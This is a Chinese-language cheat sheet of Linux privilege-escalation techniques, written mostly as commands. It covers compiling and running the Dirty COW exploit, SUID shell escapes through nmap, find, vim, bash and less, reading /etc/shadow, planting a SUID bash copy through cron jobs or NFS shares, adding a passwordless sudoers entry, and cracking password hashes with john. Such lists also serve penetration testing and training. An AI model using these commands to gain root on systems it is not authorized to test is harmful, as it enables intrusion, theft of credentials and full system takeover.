+
最详细Linux提权总结
1. 内核漏洞提权
脏牛提权
查看发行版本:
cat /etc/issue
或
cat /etc/*-release
查看内核版本信息:
uname -a
使用
searchsploit
搜索内核版本漏洞,例如
searchsploit linux 3.2.78
编译并运行提权脚本:
bash
gcc -pthread 40839.c -o 40839 -lcrypt ./40839 su firefart
2. 工具利用
linux-exploit-suggester
linux-exploit-suggester-2
3. SUID配置错误提权
SUID简介
仅可执行的二进制程序文件能设定SUID权限。
执行者需对文件有执行权限。
执行时获得文件属主的身份。
仅在程序执行过程中有效。
SUID设置
设置:
chmod u+s FILE
取消:
chmod u-s FILE
提权方法
查找具有root权限的SUID文件:
bash
find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
利用常见命令提权:
nmap
bash
nmap --interactive nmap> !sh
find
bash
touch abc find abc -exec whoami \;
vim
bash
vim.tiny /etc/shadow :set shell=/bin/sh :shell
bash
bash
bash -p
less和more
bash
less /etc/passwd !/bin/sh
4. 计划任务提权
列出计划任务:
bash
ls -l /etc/cron* cat /etc/crontab
修改权限配置不当的计划任务文件:
bash
cp /bin/bash /tmp/bash chmod u+s /tmp/bash
5. sudo配置错误提权
配置sudo免密码:
bash
vim /etc/sudoers 添加:test ALL=(ALL:ALL) NOPASSWD:ALL
6. 明文root密码提权
passwd文件
修改
x
为已知密码的hash值。
shadow文件
利用john等工具爆破hash:
bash
john --user=test test.hash
7. 密码复用提权
使用已知的数据库或后台web密码尝试提权。
8. 第三方服务提权
NFS提权
查看NFS服务器共享目录:
bash
sudo showmount -e x.x.x.x sudo mkdir -p /tmp sudo mount -t nfs x.x.x.x:/home/test /tmp cp /bin/bash /tmp/shell chmod u+s /tmp/shell
获取root权限:
bash
shell -p
数据库提权
UDF提权
MOF提权
启动项提权
CVE-2016-6663、CVE-2016-6664组合提权
反弹端口提权
总结
这篇文章详细总结了多种Linux提权方法,包括内核漏洞、工具利用、SUID配置错误、计划任务、sudo配置错误、明文密码、密码复用及第三方服务提权。这些方法对于提升权限具有重要参考价值。